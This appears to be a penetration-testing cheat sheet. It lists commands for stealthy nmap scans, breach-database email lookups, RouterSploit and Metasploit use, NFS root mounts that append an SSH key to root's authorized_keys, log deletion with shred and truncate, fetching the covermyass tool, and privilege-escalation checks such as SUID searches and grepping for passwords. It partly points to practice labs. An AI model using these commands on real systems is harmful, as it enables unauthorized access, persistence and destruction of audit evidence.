Used for network reconnaissance, port exploration, OS exploration or vulnerability exploration.
# Show TCP ports for a domain, ip, or range nmap -sT domain.name.com.or.ip # Similar to the command above but tries to be stealthy nmap -sS domain.name.com.or.ip # Perform aggressive scan sudo nmap -A domain.name.com.or.ip # Try to identify the OS of network machines sudo nmap -O domain.name.com.or.ip # Try to get the version number of the open applications sudo nmap -sV domain.name.com.or.ip # Run vulnerability analysis on all machines of the network sudo nmap -sV -p21-8080 --script vulners 192.168.1.1/24 # Use decoy IP and MAC addresses to be extra stealthy (Sometimes using mac # spoofing or too many decoys will make the analysis fail). sudo nmap -O domain.name.com.or.ip -D RND:5 --spoof-mac 01:02:03:04:05:06 # Perform a service scan with a UDP scan and drop the initial ping. sudo nmap -sS -sU -PN 192.168.1.1
Can be used to explore the social networks that a given person is a member of.
- URL: https://github.com/sherlock-project/sherlock
python3 sherlock username
This tool can be used to explore a password database breach to find available passwords for one or more given email adresses.
# Query a single target h8mail -t email@example.com # Query a single target with a local breach dump h8mail -t firstname.lastname@example.org -lb '/path/to/breach/compilation/directory' # Query a list of targets without API calls against the Breach Compilation. h8mail -t targets.txt -bc /path/to/breach/compilation/directory -sk
Shodan is a search engine for vulnerable internet connected devices. Using it we can potentially find webcams, satellite telephones, etc. In some cases, they could be unsecured or use a simple user/password combination.
A high performance offensive security tool for reconnaissance and vulnerability scanning. Similar to nmap but it offers more exhaustive analysis and extensive reporting capabilities.
Try to find and exploit vulnerabilities in routers and embedded devices with the RouterSploit framework.
# Start the framework python3 rsf.py # Try autopwn use scanners/autopwn show options set target 192.168.1.1 run
If the analysis has found vulnerabilities, the exploit can be ran with:
use exploits/reported/exploit/path set target 22.214.171.124 check run
To find target devices, we can search open ports with nmap:
nmap -p 80,8080,8081,81 192.168.1.0/24
Framework for exploring and exploiting vulnerabilities.
A typical approach would be to:
- Perform exploration of a particular remote/local system to find vulnerabilities.
- Try get shell access.
- Create a meterpreter session.
- Perform privilege escalation or exploit the current user permissions.
- Post exploitation, might include clearing tracks (Changing or shredding
.zsh_history), installing a keylogger or backdoor, uploading and running viruses, download files, take webcam picures/videos, etc.
If the .rhosts file is misconfigured with “+ +” and the ports 512(exec),513(login),514(shell) are opoen, we can just login using rsh-client without user/password with:
rlogin -l root ip.or.domain.name
Exposed NFS filesystems
If port 2049 is open, this can mean that NFS is active on the target machine.
# Check rpc info to identify NFS rpcinfo -p ip.or.domain.name # Show what is being mounted, hopefully the / share (`/ *`) showmount -e ip.or.domain.name # Exploit this by mounting the root filesystem and adding our key to the # authorized ssh keys for root. Note that for extra protection we could create # a new ssh key for each attack instead of using the default one, that could give # us away. mount -t nfs ip.or.domain.name:/ /mnt cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys umount /mnt ssh email@example.com
If we can tamper with some connection oriented services, we could insert a backdoor that allows us to connect without anyone noticing. For example, in metasploitable2 there is a doctored
vsftpd service that opens a backdoor if the username ends with the
:) sequence, opening a listening shell on port 6200.
Very often we can find vulnerable web services, be it because of misconfiguration, default admin passwords, or just vulnerable to the common attacks that web apps are susceptible of. We can practice these with metasploitable2 on the multillidae web application.
- NOWASP: https://sourceforge.net/projects/mutillidae/
- TUTORIALS: https://www.youtube.com/user/webpwnized
Searching for vulnerabilities
There are different search engines and databases that we can use to try to find active vulnerabilities.
In linux we can use the tool Searchsploit to download offline reports of vulnerabilities.
searchsploit kernel 2.6 linux | sort -n
It is important to read through the code of the exploits instead of blindly running things you find on the internet.
Removing log files
Some interesting log files that we want to get rid of
rm -rf filename, truncate
truncate -s 0 filename, shred
shred -zu filename, or even zeroing a file
cat /dev/null > filename:
/var/log/auth.log /var/log/cron.log /var/log/maillog /var/log/httpd
There are some specified tools for this purpose, like covermyass:
wget "https://github.com/sundowndev/go-covermyass/releases/download/v0.2/go-covermyass_Linux_x86_64.tar.gz" tar xfv go-covermyass.tar.gz chmod +x go-covermyass ./go-covermyass
If you manage to get a shell to the target machine, there are several things you can do to try to get root. First of all, do some local research:
- Sytem info:
- Who else has logged in:
- Is the user in sudoers:
- Are ther other root users:
grep -v -E "^#" /etc/passwd
- What is the network configuration:
- Is there something interesting on the bash/shell history?
You can gather more intel about running serices and versions of software to try detect the attack surface.
- Enumerate services, specially those being run by root:
- List versions of installed software:
At this stage you can use searchsploit to try to find vulnerabilities on the kernel, privileged services or anything that caught your attention.
Because simple solutions are always better, try get more info from:
- SUID/SGID files:
find / -perm -u=s -type f 2>/dev/null
- Password hashes:
- Can you overwrite files that will get run by root?
- Check jobs/tasks:
ls -la /etc/cron*
- Are the ssh keys readable or can be modified in any user:
ls -la ~/.ssh
- Are there any cleartext credentials in varios configurations files:
find . -type f -maxdepth 4 | xargs grep -i "password"
- Check file/folder permissions, specially on home directories, and backups.
Sometimes complicated things can pay off also!
- Check for shell/exec system calls on root programs to try to set the path of custom executables. For example if a system call uses the
grepprogram from within a root/SUID/SGID file, without an explicit path, we can create a custom
grepthat runs an exploit, put it on an executable on the local directory and export current path with
- Missing DLLs
- Service hijacking